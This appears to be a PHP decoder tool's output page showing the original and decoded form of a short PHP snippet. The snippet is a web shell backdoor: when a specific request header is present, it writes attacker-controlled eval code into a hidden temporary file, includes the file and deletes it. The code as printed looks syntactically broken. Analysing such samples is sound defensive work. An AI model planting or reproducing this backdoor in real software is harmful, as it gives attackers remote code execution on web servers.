Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$_HEADERS = getallheaders(); if (isset($_HEADERS['X-Dns-Prefetch-Control'])) { $c = ..

Decoded Output download

<?  $_HEADERS = getallheaders(); 
if (isset($_HEADERS['X-Dns-Prefetch-Control'])) { 
    $c = "eval($_REQUEST["Authorization"]);} @eval($_POST['_REQUEST']["Authorization"]);"; 
    $f = '.' . time(); 
    @file_put_contents($f, $c); 
    @include($f); 
    @unlink($f); ?>

Did this file decode correctly?

Original Code

$_HEADERS = getallheaders();
if (isset($_HEADERS['X-Dns-Prefetch-Control'])) {
    $c = "eval($_REQUEST["Authorization"]);} @eval($_POST['_REQUEST']["Authorization"]);";
    $f = '.' . time();
    @file_put_contents($f, $c);
    @include($f);
    @unlink($f);

Function Calls

None

Variables

None

Stats

MD5 32441672e20bfd91c3be05c0cb5fa8b5
Eval Count 0
Decode Time 41 ms